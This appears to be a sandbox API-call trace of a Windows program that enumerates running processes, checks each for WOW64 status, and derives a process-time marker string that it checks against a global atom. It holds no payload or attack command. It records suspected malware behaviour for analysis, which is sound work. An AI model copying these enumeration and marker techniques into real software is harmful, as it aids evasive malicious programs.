	[0073.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.423] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.423] CloseHandle (hObject=0x224) returned 1
	[0073.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728978, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.423] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.423] CloseHandle (hObject=0x224) returned 1
	[0073.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.423] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.423] CloseHandle (hObject=0x224) returned 1
	[0073.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.424] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.424] CloseHandle (hObject=0x224) returned 1
	[0073.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.424] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.424] CloseHandle (hObject=0x224) returned 1
	[0073.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.424] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.424] CloseHandle (hObject=0x224) returned 1
	[0073.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728998, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.425] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.425] CloseHandle (hObject=0x224) returned 1
	[0073.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728a18, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.425] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.425] CloseHandle (hObject=0x224) returned 1
	[0073.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.425] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.425] CloseHandle (hObject=0x224) returned 1
	[0073.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7288b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.425] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.425] CloseHandle (hObject=0x224) returned 1
	[0073.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e680, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.425] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.426] CloseHandle (hObject=0x224) returned 1
	[0073.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.426] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.426] CloseHandle (hObject=0x224) returned 1
	[0073.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.426] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.426] CloseHandle (hObject=0x224) returned 1
	[0073.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.426] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.426] CloseHandle (hObject=0x224) returned 1
	[0073.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728878, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0073.426] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.426] CloseHandle (hObject=0x224) returned 1
	[0073.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.427] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.427] CloseHandle (hObject=0x224) returned 1
	[0073.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.427] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.427] CloseHandle (hObject=0x224) returned 1
	[0073.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.427] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.427] CloseHandle (hObject=0x224) returned 1
	[0073.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e798, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.427] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.427] CloseHandle (hObject=0x224) returned 1
	[0073.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.427] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.427] CloseHandle (hObject=0x224) returned 1
	[0073.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.428] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.428] CloseHandle (hObject=0x224) returned 1
	[0073.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728878, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.428] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.428] CloseHandle (hObject=0x224) returned 1
	[0073.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.428] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.428] CloseHandle (hObject=0x224) returned 1
	[0073.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.428] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.428] CloseHandle (hObject=0x224) returned 1
	[0073.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e7c0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.428] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.428] CloseHandle (hObject=0x224) returned 1
	[0073.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e6a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.429] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.429] CloseHandle (hObject=0x224) returned 1
	[0073.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.429] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.430] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.430] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.430] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.431] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetLastError () returned 0x5
	[0073.432] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.432] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.433] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.433] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.433] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.433] CloseHandle (hObject=0x224) returned 1
	[0073.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.433] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.433] CloseHandle (hObject=0x224) returned 1
	[0073.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e6d0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.433] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.433] CloseHandle (hObject=0x224) returned 1
	[0073.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.477] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
